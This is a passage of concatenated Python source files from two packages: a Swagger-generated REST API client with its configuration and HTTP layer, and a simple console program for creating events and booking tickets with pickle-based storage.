# Set default User-Agent.
self.user_agent = 'Swagger-Codegen/1.0.0/python'
def __del__(self):
self.pool.close()
self.pool.join()
@property
def user_agent(self):
"""User agent for this API client"""
return self.default_headers['User-Agent']
@user_agent.setter
def user_agent(self, value):
self.default_headers['User-Agent'] = value
def set_default_header(self, header_name, header_value):
self.default_headers[header_name] = header_value
def __call_api(
self, resource_path, method, path_params=None,
query_params=None, header_params=None, body=None, post_params=None,
files=None, response_type=None, auth_settings=None,
_return_http_data_only=None, collection_formats=None,
_preload_content=True, _request_timeout=None):
config = self.configuration
# header parameters
header_params = header_params or {}
header_params.update(self.default_headers)
if self.cookie:
header_params['Cookie'] = self.cookie
if header_params:
header_params = self.sanitize_for_serialization(header_params)
header_params = dict(self.parameters_to_tuples(header_params,
collection_formats))
# path parameters
if path_params:
path_params = self.sanitize_for_serialization(path_params)
path_params = self.parameters_to_tuples(path_params,
collection_formats)
for k, v in path_params:
# specified safe chars, encode everything
resource_path = resource_path.replace(
'{%s}' % k,
quote(str(v), safe=config.safe_chars_for_path_param)
)
# query parameters
if query_params:
query_params = self.sanitize_for_serialization(query_params)
query_params = self.parameters_to_tuples(query_params,
collection_formats)
# post parameters
if post_params or files:
post_params = self.prepare_post_parameters(post_params, files)
post_params = self.sanitize_for_serialization(post_params)
post_params = self.parameters_to_tuples(post_params,
collection_formats)
# auth setting
self.update_params_for_auth(header_params, query_params, auth_settings)
# body
if body:
body = self.sanitize_for_serialization(body)
# request url
url = self.configuration.host + resource_path
# perform request and return response
response_data = self.request(
method, url, query_params=query_params, headers=header_params,
post_params=post_params, body=body,
_preload_content=_preload_content,
_request_timeout=_request_timeout)
self.last_response = response_data
return_data = response_data
if _preload_content:
# deserialize response data
if response_type:
return_data = self.deserialize(response_data, response_type)
else:
return_data = None
if _return_http_data_only:
return (return_data)
else:
return (return_data, response_data.status,
response_data.getheaders())
def sanitize_for_serialization(self, obj):
"""Builds a JSON POST object.
If obj is None, return None.
If obj is str, int, long, float, bool, return directly.
If obj is datetime.datetime, datetime.date
convert to string in iso8601 format.
If obj is list, sanitize each element in the list.
If obj is dict, return the dict.
If obj is swagger model, return the properties dict.
:param obj: The data to serialize.
:return: The serialized form of data.
"""
if obj is None:
return None
elif isinstance(obj, self.PRIMITIVE_TYPES):
return obj
elif isinstance(obj, list):
return [self.sanitize_for_serialization(sub_obj)
for sub_obj in obj]
elif isinstance(obj, tuple):
return tuple(self.sanitize_for_serialization(sub_obj)
for sub_obj in obj)
elif isinstance(obj, (datetime.datetime, datetime.date)):
return obj.isoformat()
if isinstance(obj, dict):
obj_dict = obj
else:
# Convert model obj to dict except
# attributes `swagger_types`, `attribute_map`
# and attributes which value is not None.
# Convert attribute name to json key in
# model definition for request.
obj_dict = {obj.attribute_map[attr]: getattr(obj, attr)
for attr, _ in six.iteritems(obj.swagger_types)
if getattr(obj, attr) is not None}
return {key: self.sanitize_for_serialization(val)
for key, val in six.iteritems(obj_dict)}
def deserialize(self, response, response_type):
"""Deserializes response into an object.
:param response: RESTResponse object to be deserialized.
:param response_type: class literal for
deserialized object, or string of class name.
:return: deserialized object.
"""
# handle file downloading
# save response body into a tmp file and return the instance
if response_type == "file":
return self.__deserialize_file(response)
# fetch data from response object
try:
data = json.loads(response.data)
except ValueError:
data = response.data
return self.__deserialize(data, response_type)
def __deserialize(self, data, klass):
"""Deserializes dict, list, str into an object.
:param data: dict, list or str.
:param klass: class literal, or string of class name.
:return: object.
"""
if data is None:
return None
if type(klass) == str:
if klass.startswith('list['):
sub_kls = re.match(r'list\[(.*)\]', klass).group(1)
return [self.__deserialize(sub_data, sub_kls)
for sub_data in data]
if klass.startswith('dict('):
sub_kls = re.match(r'dict\(([^,]*), (.*)\)', klass).group(2)
return {k: self.__deserialize(v, sub_kls)
for k, v in six.iteritems(data)}
# convert str to class
if klass in self.NATIVE_TYPES_MAPPING:
klass = self.NATIVE_TYPES_MAPPING[klass]
else:
klass = getattr(swagger_client.models, klass)
if klass in self.PRIMITIVE_TYPES:
return self.__deserialize_primitive(data, klass)
elif klass == object:
return self.__deserialize_object(data)
elif klass == datetime.date:
return self.__deserialize_date(data)
elif klass == datetime.datetime:
return self.__deserialize_datatime(data)
else:
return self.__deserialize_model(data, klass)
def call_api(self, resource_path, method,
path_params=None, query_params=None, header_params=None,
body=None, post_params=None, files=None,
response_type=None, auth_settings=None, async_req=None,
_return_http_data_only=None, collection_formats=None,
_preload_content=True, _request_timeout=None):
"""Makes the HTTP request (synchronous) and returns deserialized data.
To make an async request, set the async_req parameter.
:param resource_path: Path to method endpoint.
:param method: Method to call.
:param path_params: Path parameters in the url.
:param query_params: Query parameters in the url.
:param header_params: Header parameters to be
placed in the request header.
:param body: Request body.
:param post_params dict: Request post form parameters,
for `application/x-www-form-urlencoded`, `multipart/form-data`.
:param auth_settings list: Auth Settings names for the request.
:param response: Response data type.
:param files dict: key -> filename, value -> filepath,
for `multipart/form-data`.
:param async_req bool: execute request asynchronously
:param _return_http_data_only: response data without head status code
and headers
:param collection_formats: dict of collection formats for path, query,
header, and post parameters.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return:
If async_req parameter is True,
the request will be called asynchronously.
The method will return the request thread.
If parameter async_req is False or missing,
then the method will return the response directly.
"""
if not async_req:
return self.__call_api(resource_path, method,
path_params, query_params, header_params,
body, post_params, files,
response_type, auth_settings,
_return_http_data_only, collection_formats,
_preload_content, _request_timeout)
else:
thread = self.pool.apply_async(self.__call_api, (resource_path,
method, path_params, query_params,
header_params, body,
post_params, files,
response_type, auth_settings,
_return_http_data_only,
collection_formats,
_preload_content, _request_timeout))
return thread
def request(self, method, url, query_params=None, headers=None,
post_params=None, body=None, _preload_content=True,
_request_timeout=None):
"""Makes the HTTP request using RESTClient."""
if method == "GET":
return self.rest_client.GET(url,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
headers=headers)
elif method == "HEAD":
return self.rest_client.HEAD(url,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
headers=headers)
elif method == "OPTIONS":
return self.rest_client.OPTIONS(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "POST":
return self.rest_client.POST(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "PUT":
return self.rest_client.PUT(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "PATCH":
return self.rest_client.PATCH(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "DELETE":
return self.rest_client.DELETE(url,
query_params=query_params,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
else:
raise ValueError(
"http method must be `GET`, `HEAD`, `OPTIONS`,"
" `POST`, `PATCH`, `PUT` or `DELETE`."
)
def parameters_to_tuples(self, params, collection_formats):
"""Get parameters as list of tuples, formatting collections.
:param params: Parameters as dict or list of two-tuples
:param dict collection_formats: Parameter collection formats
:return: Parameters as list of tuples, collections formatted
"""
new_params = []
if collection_formats is None:
collection_formats = {}
for k, v in six.iteritems(params) if isinstance(params, dict) else params: # noqa: E501
if k in collection_formats:
collection_format = collection_formats[k]
if collection_format == 'multi':
new_params.extend((k, value) for value in v)
else:
if collection_format == 'ssv':
delimiter = ' '
elif collection_format == 'tsv':
delimiter = '\t'
elif collection_format == 'pipes':
delimiter = '|'
else: # csv is the default
delimiter = ','
new_params.append(
(k, delimiter.join(str(value) for value in v)))
else:
new_params.append((k, v))
return new_params
def prepare_post_parameters(self, post_params=None, files=None):
"""Builds form parameters.
:param post_params: Normal form parameters.
:param files: File parameters.
:return: Form parameters with files.
"""
params = []
if post_params:
params = post_params
if files:
for k, v in six.iteritems(files):
if not v:
continue
file_names = v if type(v) is list else [v]
for n in file_names:
with open(n, 'rb') as f:
filename = os.path.basename(f.name)
filedata = f.read()
mimetype = (mimetypes.guess_type(filename)[0] or
'application/octet-stream')
params.append(
tuple([k, tuple([filename, filedata, mimetype])]))
return params
def select_header_accept(self, accepts):
"""Returns `Accept` based on an array of accepts provided.
:param accepts: List of headers.
:return: Accept (e.g. application/json).
"""
if not accepts:
return
accepts = [x.lower() for x in accepts]
if 'application/json' in accepts:
return 'application/json'
else:
return ', '.join(accepts)
def select_header_content_type(self, content_types):
"""Returns `Content-Type` based on an array of content_types provided.
:param content_types: List of content-types.
:return: Content-Type (e.g. application/json).
"""
if not content_types:
return 'application/json'
content_types = [x.lower() for x in content_types]
if 'application/json' in content_types or '*/*' in content_types:
return 'application/json'
else:
return content_types[0]
def update_params_for_auth(self, headers, querys, auth_settings):
"""Updates header and query params based on authentication setting.
:param headers: Header parameters dict to be updated.
:param querys: Query parameters tuple list to be updated.
:param auth_settings: Authentication setting identifiers list.
"""
if not auth_settings:
return
for auth in auth_settings:
auth_setting = self.configuration.auth_settings().get(auth)
if auth_setting:
if not auth_setting['value']:
continue
elif auth_setting['in'] == 'header':
headers[auth_setting['key']] = auth_setting['value']
elif auth_setting['in'] == 'query':
querys.append((auth_setting['key'], auth_setting['value']))
else:
raise ValueError(
'Authentication token must be in `query` or `header`'
)
def __deserialize_file(self, response):
"""Deserializes body to file
Saves response body into a file in a temporary folder,
using the filename from the `Content-Disposition` header if provided.
:param response: RESTResponse.
:return: file path.
"""
fd, path = tempfile.mkstemp(dir=self.configuration.temp_folder_path)
os.close(fd)
os.remove(path)
content_disposition = response.getheader("Content-Disposition")
if content_disposition:
filename = re.search(r'filename=[\'"]?([^\'"\s]+)[\'"]?',
content_disposition).group(1)
path = os.path.join(os.path.dirname(path), filename)
response_data = response.data
with open(path, "wb") as f:
if isinstance(response_data, str):
# change str to bytes so we can write it
response_data = response_data.encode('utf-8')
f.write(response_data)
else:
f.write(response_data)
return path
def __deserialize_primitive(self, data, klass):
"""Deserializes string to primitive type.
:param data: str.
:param klass: class literal.
:return: int, long, float, str, bool.
"""
try:
return klass(data)
except UnicodeEncodeError:
return six.text_type(data)
except TypeError:
return data
def __deserialize_object(self, value):
"""Return a original value.
:return: object.
"""
return value
def __deserialize_date(self, string):
"""Deserializes string to date.
:param string: str.
:return: date.
"""
try:
from dateutil.parser import parse
return parse(string).date()
except ImportError:
return string
except ValueError:
raise rest.ApiException(
status=0,
reason="Failed to parse `{0}` as date object".format(string)
)
def __deserialize_datatime(self, string):
"""Deserializes string to datetime.
The string should be in iso8601 datetime format.
:param string: str.
:return: datetime.
"""
try:
from dateutil.parser import parse
return parse(string)
except ImportError:
return string
except ValueError:
raise rest.ApiException(
status=0,
reason=(
"Failed to parse `{0}` as datetime object"
.format(string)
)
)
def __hasattr(self, object, name):
return name in object.__class__.__dict__
def __deserialize_model(self, data, klass):
"""Deserializes list or dict to model.
:param data: dict, list.
:param klass: class literal.
:return: model object.
"""
if not klass.swagger_types and not self.__hasattr(klass, 'get_real_child_model'):
return data
kwargs = {}
if klass.swagger_types is not None:
for attr, attr_type in six.iteritems(klass.swagger_types):
if (data is not None and
klass.attribute_map[attr] in data and
isinstance(data, (list, dict))):
value = data[klass.attribute_map[attr]]
kwargs[attr] = self.__deserialize(value, attr_type)
instance = klass(**kwargs)
if (isinstance(instance, dict) and
klass.swagger_types is not None and
isinstance(data, dict)):
for key, value in data.items():
if key not in klass.swagger_types:
instance[key] = value
if self.__hasattr(instance, 'get_real_child_model'):
klass_name = instance.get_real_child_model(data)
if klass_name:
instance = self.__deserialize(data, klass_name)
return instance | 42di | /42di-0.2.6.tar.gz/42di-0.2.6/swagger_client/api_client.py | api_client.py |
from __future__ import absolute_import
import io
import json
import logging
import re
import ssl
import certifi
# python 2 and python 3 compatibility library
import six
from six.moves.urllib.parse import urlencode
try:
import urllib3
except ImportError:
raise ImportError('Swagger python client requires urllib3.')
logger = logging.getLogger(__name__)
class RESTResponse(io.IOBase):
def __init__(self, resp):
self.urllib3_response = resp
self.status = resp.status
self.reason = resp.reason
self.data = resp.data
def getheaders(self):
"""Returns a dictionary of the response headers."""
return self.urllib3_response.getheaders()
def getheader(self, name, default=None):
"""Returns a given response header."""
return self.urllib3_response.getheader(name, default)
class RESTClientObject(object):
def __init__(self, configuration, pools_size=4, maxsize=None):
# urllib3.PoolManager will pass all kw parameters to connectionpool
# https://github.com/shazow/urllib3/blob/f9409436f83aeb79fbaf090181cd81b784f1b8ce/urllib3/poolmanager.py#L75 # noqa: E501
# https://github.com/shazow/urllib3/blob/f9409436f83aeb79fbaf090181cd81b784f1b8ce/urllib3/connectionpool.py#L680 # noqa: E501
# maxsize is the number of requests to host that are allowed in parallel # noqa: E501
# Custom SSL certificates and client certificates: http://urllib3.readthedocs.io/en/latest/advanced-usage.html # noqa: E501
# cert_reqs
if configuration.verify_ssl:
cert_reqs = ssl.CERT_REQUIRED
else:
cert_reqs = ssl.CERT_NONE
# ca_certs
if configuration.ssl_ca_cert:
ca_certs = configuration.ssl_ca_cert
else:
# if not set certificate file, use Mozilla's root certificates.
ca_certs = certifi.where()
addition_pool_args = {}
if configuration.assert_hostname is not None:
addition_pool_args['assert_hostname'] = configuration.assert_hostname # noqa: E501
if maxsize is None:
if configuration.connection_pool_maxsize is not None:
maxsize = configuration.connection_pool_maxsize
else:
maxsize = 4
# https pool manager
if configuration.proxy:
self.pool_manager = urllib3.ProxyManager(
num_pools=pools_size,
maxsize=maxsize,
cert_reqs=cert_reqs,
ca_certs=ca_certs,
cert_file=configuration.cert_file,
key_file=configuration.key_file,
proxy_url=configuration.proxy,
**addition_pool_args
)
else:
self.pool_manager = urllib3.PoolManager(
num_pools=pools_size,
maxsize=maxsize,
cert_reqs=cert_reqs,
ca_certs=ca_certs,
cert_file=configuration.cert_file,
key_file=configuration.key_file,
**addition_pool_args
)
def request(self, method, url, query_params=None, headers=None,
body=None, post_params=None, _preload_content=True,
_request_timeout=None):
"""Perform requests.
:param method: http request method
:param url: http request url
:param query_params: query parameters in the url
:param headers: http request headers
:param body: request json body, for `application/json`
:param post_params: request post parameters,
`application/x-www-form-urlencoded`
and `multipart/form-data`
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
"""
method = method.upper()
assert method in ['GET', 'HEAD', 'DELETE', 'POST', 'PUT',
'PATCH', 'OPTIONS']
if post_params and body:
raise ValueError(
"body parameter cannot be used with post_params parameter."
)
post_params = post_params or {}
headers = headers or {}
timeout = None
if _request_timeout:
if isinstance(_request_timeout, (int, ) if six.PY3 else (int, long)): # noqa: E501,F821
timeout = urllib3.Timeout(total=_request_timeout)
elif (isinstance(_request_timeout, tuple) and
len(_request_timeout) == 2):
timeout = urllib3.Timeout(
connect=_request_timeout[0], read=_request_timeout[1])
if 'Content-Type' not in headers:
headers['Content-Type'] = 'application/json'
try:
# For `POST`, `PUT`, `PATCH`, `OPTIONS`, `DELETE`
if method in ['POST', 'PUT', 'PATCH', 'OPTIONS', 'DELETE']:
if query_params:
url += '?' + urlencode(query_params)
if re.search('json', headers['Content-Type'], re.IGNORECASE):
request_body = '{}'
if body is not None:
request_body = json.dumps(body)
r = self.pool_manager.request(
method, url,
body=request_body,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
elif headers['Content-Type'] == 'application/x-www-form-urlencoded': # noqa: E501
r = self.pool_manager.request(
method, url,
fields=post_params,
encode_multipart=False,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
elif headers['Content-Type'] == 'multipart/form-data':
# must del headers['Content-Type'], or the correct
# Content-Type which generated by urllib3 will be
# overwritten.
del headers['Content-Type']
r = self.pool_manager.request(
method, url,
fields=post_params,
encode_multipart=True,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
# Pass a `string` parameter directly in the body to support
# other content types than Json when `body` argument is
# provided in serialized form
elif isinstance(body, str) or isinstance(body, bytes):
if isinstance(body, str) :
request_body = body.encode("utf-8")
else:
request_body = body
r = self.pool_manager.request(
method, url,
body=request_body,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
else:
# Cannot generate the request from given parameters
msg = """Cannot prepare a request message for provided
arguments. Please check that your arguments match
declared content type."""
raise ApiException(status=0, reason=msg)
# For `GET`, `HEAD`
else:
r = self.pool_manager.request(method, url,
fields=query_params,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
except urllib3.exceptions.SSLError as e:
msg = "{0}\n{1}".format(type(e).__name__, str(e))
raise ApiException(status=0, reason=msg)
if _preload_content:
r = RESTResponse(r)
# log response body
logger.debug("response body: %s", r.data)
if not 200 <= r.status <= 299:
raise ApiException(http_resp=r)
return r
def GET(self, url, headers=None, query_params=None, _preload_content=True,
_request_timeout=None):
return self.request("GET", url,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
query_params=query_params)
def HEAD(self, url, headers=None, query_params=None, _preload_content=True,
_request_timeout=None):
return self.request("HEAD", url,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
query_params=query_params)
def OPTIONS(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("OPTIONS", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def DELETE(self, url, headers=None, query_params=None, body=None,
_preload_content=True, _request_timeout=None):
return self.request("DELETE", url,
headers=headers,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def POST(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("POST", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def PUT(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("PUT", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def PATCH(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("PATCH", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
class ApiException(Exception):
def __init__(self, status=None, reason=None, http_resp=None):
if http_resp:
self.status = http_resp.status
self.reason = http_resp.reason
self.body = http_resp.data
self.headers = http_resp.getheaders()
else:
self.status = status
self.reason = reason
self.body = None
self.headers = None
def __str__(self):
"""Custom error messages for exception"""
error_message = "({0})\n"\
"Reason: {1}\n".format(self.status, self.reason)
if self.headers:
error_message += "HTTP response headers: {0}\n".format(
self.headers)
if self.body:
error_message += "HTTP response body: {0}\n".format(self.body)
return error_message | 42di | /42di-0.2.6.tar.gz/42di-0.2.6/swagger_client/rest.py | rest.py |
from __future__ import absolute_import
import copy
import logging
import multiprocessing
import sys
import urllib3
import six
from six.moves import http_client as httplib
class TypeWithDefault(type):
def __init__(cls, name, bases, dct):
super(TypeWithDefault, cls).__init__(name, bases, dct)
cls._default = None
def __call__(cls):
if cls._default is None:
cls._default = type.__call__(cls)
return copy.copy(cls._default)
def set_default(cls, default):
cls._default = copy.copy(default)
class Configuration(six.with_metaclass(TypeWithDefault, object)):
"""NOTE: This class is auto generated by the swagger code generator program.
Ref: https://github.com/swagger-api/swagger-codegen
Do not edit the class manually.
"""
def __init__(self):
"""Constructor"""
# Default Base url
self.host = "/api/v1"
# Temp file folder for downloading files
self.temp_folder_path = None
# Authentication Settings
# dict to store API key(s)
self.api_key = {}
# dict to store API prefix (e.g. Bearer)
self.api_key_prefix = {}
# function to refresh API key if expired
self.refresh_api_key_hook = None
# Username for HTTP basic authentication
self.username = ""
# Password for HTTP basic authentication
self.password = ""
# Logging Settings
self.logger = {}
self.logger["package_logger"] = logging.getLogger("swagger_client")
self.logger["urllib3_logger"] = logging.getLogger("urllib3")
# Log format
self.logger_format = '%(asctime)s %(levelname)s %(message)s'
# Log stream handler
self.logger_stream_handler = None
# Log file handler
self.logger_file_handler = None
# Debug file location
self.logger_file = None
# Debug switch
self.debug = False
# SSL/TLS verification
# Set this to false to skip verifying SSL certificate when calling API
# from https server.
self.verify_ssl = True
# Set this to customize the certificate file to verify the peer.
self.ssl_ca_cert = None
# client certificate file
self.cert_file = None
# client key file
self.key_file = None
# Set this to True/False to enable/disable SSL hostname verification.
self.assert_hostname = None
# urllib3 connection pool's maximum number of connections saved
# per pool. urllib3 uses 1 connection as default value, but this is
# not the best value when you are making a lot of possibly parallel
# requests to the same host, which is often the case here.
# cpu_count * 5 is used as default value to increase performance.
self.connection_pool_maxsize = multiprocessing.cpu_count() * 5
# Proxy URL
self.proxy = None
# Safe chars for path_param
self.safe_chars_for_path_param = ''
@property
def logger_file(self):
"""The logger file.
If the logger_file is None, then add stream handler and remove file
handler. Otherwise, add file handler and remove stream handler.
:param value: The logger_file path.
:type: str
"""
return self.__logger_file
@logger_file.setter
def logger_file(self, value):
"""The logger file.
If the logger_file is None, then add stream handler and remove file
handler. Otherwise, add file handler and remove stream handler.
:param value: The logger_file path.
:type: str
"""
self.__logger_file = value
if self.__logger_file:
# If set logging file,
# then add file handler and remove stream handler.
self.logger_file_handler = logging.FileHandler(self.__logger_file)
self.logger_file_handler.setFormatter(self.logger_formatter)
for _, logger in six.iteritems(self.logger):
logger.addHandler(self.logger_file_handler)
if self.logger_stream_handler:
logger.removeHandler(self.logger_stream_handler)
else:
# If not set logging file,
# then add stream handler and remove file handler.
self.logger_stream_handler = logging.StreamHandler()
self.logger_stream_handler.setFormatter(self.logger_formatter)
for _, logger in six.iteritems(self.logger):
logger.addHandler(self.logger_stream_handler)
if self.logger_file_handler:
logger.removeHandler(self.logger_file_handler)
@property
def debug(self):
"""Debug status
:param value: The debug status, True or False.
:type: bool
"""
return self.__debug
@debug.setter
def debug(self, value):
"""Debug status
:param value: The debug status, True or False.
:type: bool
"""
self.__debug = value
if self.__debug:
# if debug status is True, turn on debug logging
for _, logger in six.iteritems(self.logger):
logger.setLevel(logging.DEBUG)
# turn on httplib debug
httplib.HTTPConnection.debuglevel = 1
else:
# if debug status is False, turn off debug logging,
# setting log level to default `logging.WARNING`
for _, logger in six.iteritems(self.logger):
logger.setLevel(logging.WARNING)
# turn off httplib debug
httplib.HTTPConnection.debuglevel = 0
@property
def logger_format(self):
"""The logger format.
The logger_formatter will be updated when sets logger_format.
:param value: The format string.
:type: str
"""
return self.__logger_format
@logger_format.setter
def logger_format(self, value):
"""The logger format.
The logger_formatter will be updated when sets logger_format.
:param value: The format string.
:type: str
"""
self.__logger_format = value
self.logger_formatter = logging.Formatter(self.__logger_format)
def get_api_key_with_prefix(self, identifier):
"""Gets API key (with prefix if set).
:param identifier: The identifier of apiKey.
:return: The token for api key authentication.
"""
if self.refresh_api_key_hook:
self.refresh_api_key_hook(self)
key = self.api_key.get(identifier)
if key:
prefix = self.api_key_prefix.get(identifier)
if prefix:
return "%s %s" % (prefix, key)
else:
return key
def get_basic_auth_token(self):
"""Gets HTTP basic authentication header (string).
:return: The token for basic HTTP authentication.
"""
return urllib3.util.make_headers(
basic_auth=self.username + ':' + self.password
).get('authorization')
def auth_settings(self):
"""Gets Auth Settings dict for api client.
:return: The Auth Settings information dict.
"""
return {
'APIKeyAuth':
{
'type': 'api_key',
'in': 'header',
'key': 'X-API-Key',
'value': self.get_api_key_with_prefix('X-API-Key')
},
'AccessToken':
{
'type': 'api_key',
'in': 'query',
'key': 'token',
'value': self.get_api_key_with_prefix('token')
},
}
def to_debug_report(self):
"""Gets the essential information for debugging.
:return: The report for debugging.
"""
return "Python SDK Debug Report:\n"\
"OS: {env}\n"\
"Python Version: {pyversion}\n"\
"Version of the API: 1.0\n"\
"SDK Package Version: 1.0.0".\
format(env=sys.platform, pyversion=sys.version) | 42di | /42di-0.2.6.tar.gz/42di-0.2.6/swagger_client/configuration.py | configuration.py |
import os
import pathlib
import pickle
class Ticket:
name = ''
email = ''
event = ''
reference = 200000
def bookTicket(self):
self.name= input("Enter Customer Name: ")
self.email = input("Enter Customer Email: ")
file = pathlib.Path("events2.data")
if file.exists():
infile = open('events2.data', 'rb')
eventdetails = pickle.load(infile)
self.reference = input("Enter Reference Code(10000 - 50000) : ")
while True:
if int(self.reference) <= 10000:
print("Warning: Please Enter Valid Reference Code")
self.reference = input("Enter Reference Code(10000 - 50000) : ")
else:
break
for event in eventdetails:
print("Available Event Code : " + event.eventcode + " Event Name : " + event.eventname)
infile.close()
self.event = input("Enter Event Code: ")
def check(self):
file = pathlib.Path("tickets.data")
if file.exists():
if os.path.getsize(file) :
infile = open('tickets.data', 'rb')
ticketdetails = pickle.load(infile)
for ticket in ticketdetails:
if ticket.email == self.email and ticket.event == self.event:
return True
infile.close()
def gettotalticketcount(self):
file = pathlib.Path("events2.data")
if file.exists():
infile = open('events2.data', 'rb')
eventdetails = pickle.load(infile)
for event in eventdetails:
if event.eventcode == self.event:
return int(event.eventTotalAvaibleSeat)
infile.close
else:
return 0
def getBookedSeatCount(self):
file = pathlib.Path("tickets.data")
counter= 0
if file.exists():
if os.path.getsize(file) > 0 :
infile = open('tickets.data', 'rb')
ticketdetails = pickle.load(infile)
for ticket in ticketdetails:
if ticket.event == self.event:
counter = counter + 1
return int(counter)
infile.close()
return 0 | 437-project | /437-project-1.3.tar.gz/437-project-1.3/src/Ticket.py | Ticket.py |
# Book Ticket and Check Condition
import os
import pathlib
import pickle
from src.Events import Events
from src.NetworkingEvent import NetworkingEvent
from src.PartyEvent import PartyEvent
from src.WorkshopEvent import WorkshopEvent
from src.CharityEvent import CharityEvent
from src.Ticket import Ticket
from prettytable import PrettyTable
def bookEventTicket():
ticket = Ticket()
ticket.bookTicket()
if ticket.check():
print("Warning : You Already Booked A Seat")
input('Press Enter To Return')
elif ticket.getBookedSeatCount() >= ticket.gettotalticketcount():
print("Warning : All Ticket Sold Out")
input('Press Enter To Return')
else:
print("Sucess : Ticket Booked!")
input('Press Enter To Continue')
saveTicketDetails(ticket)
# Save Ticket Detials to File
def saveTicketDetails(ticket):
file = pathlib.Path("tickets.data")
if file.exists():
infile = open('tickets.data', 'rb')
if os.path.getsize(file) > 0:
oldlist = pickle.load(infile)
oldlist.append(ticket)
infile.close()
os.remove('tickets.data')
else:
oldlist = [ticket]
else:
oldlist = [ticket]
outfile = open('tempTicket.data', 'wb')
pickle.dump(oldlist, outfile)
outfile.close()
os.rename('tempTicket.data', 'tickets.data')
# Display Saved Ticket Details
def getTicketDetails():
file = pathlib.Path("tickets.data")
if os.path.getsize(file) > 0:
infile = open('tickets.data', 'rb')
ticketdetails = pickle.load(infile)
print("---------------TICKET DETAILS---------------------")
t = PrettyTable(['T-Ref', 'C-Name', 'C-Email', 'E-Code'])
for ticket in ticketdetails :
t.add_row([ticket.reference, ticket.name, ticket.email, ticket.event])
print(t)
infile.close()
print("--------------------------------------------------")
input('Press Enter To Return To Main Menu')
else :
print("NO TICKET RECORDS FOUND")
input('Press Enter To Return')
# Create Event Module
def createCharityEvent():
event = CharityEvent()
event.createEvent()
saveEventDetails(event)
def createPartyEvent():
event = PartyEvent()
event.createEvent()
saveEventDetails(event)
def createNetworkingEvent():
event = NetworkingEvent()
event.createEvent()
saveEventDetails(event)
def createWorkshopEvent():
event = WorkshopEvent()
event.createEvent()
saveEventDetails(event)
# Save Event Details to File
def saveEventDetails(event):
file = pathlib.Path("events2.data")
if file.exists():
infile = open('events2.data', 'rb')
if os.path.getsize(file) > 0:
oldlist = pickle.load(infile)
oldlist.append(event)
infile.close()
os.remove('events2.data')
else:
oldlist = [event]
else:
oldlist = [event]
outfile = open('tempevents.data', 'wb')
pickle.dump(oldlist, outfile)
outfile.close()
os.rename('tempevents.data', 'events2.data')
# Display All Event Details
def getEventsDetails():
file = pathlib.Path("events2.data")
if file.exists ():
infile = open('events2.data','rb')
if os.path.getsize(file) > 0:
eventsdetails = pickle.load(infile)
print("---------------EVENT DETAILS---------------------")
t = PrettyTable(['E-Name', 'E-Code', 'E-Total-Seats', 'E-Type'])
for events in eventsdetails :
t.add_row([events.eventname, events.eventcode, events.eventTotalAvaibleSeat, events.eventType])
print(t)
infile.close()
print("--------------------------------------------------")
input('Press Enter To Return To Main Menu')
else:
print("NO EVENTS RECORDS FOUND")
input('Press Enter To Return')
else :
print("NO EVENTS RECORDS FOUND")
input('Press Enter To Return')
# Display Reports About Events
def getEventsSummary():
filetickets = pathlib.Path("tickets.data")
if os.path.getsize(filetickets) > 0 :
infiletickets = open('tickets.data', 'rb')
ticketdetails = pickle.load(infiletickets)
fileEvents = pathlib.Path("events2.data")
if fileEvents.exists ():
infileEvents = open('events2.data','rb')
eventdetails = pickle.load(infileEvents)
print("---------------REPORTS---------------------")
for events in eventdetails :
print("\n\nEvent Name : " + events.eventname + " | Total Seats : " + events.eventTotalAvaibleSeat + " \n")
for ticket in ticketdetails:
if events.eventcode == ticket.event:
print(ticket.reference, "\t", ticket.name, "\t", ticket.email)
infileEvents.close()
infiletickets.close()
print("--------------------------------------------------")
input('Press Enter To Return To Main Menu')
else :
print("NO EVENTS RECORDS FOUND")
input('Press Enter To Return')
else:
print("NO EVENTS RECORDS FOUND")
input('Press Enter To Return')
def createEvents():
ch = ''
num = 0
while ch != 8:
print("\t\t\t\t-----------------------")
print("\t\t\t\tEVENT MANAGEMENT SYSTEM")
print("\t\t\t\t-----------------------")
print("\tEVENT CREATION MENU")
print("\t1. CREATE CHARITY EVENT")
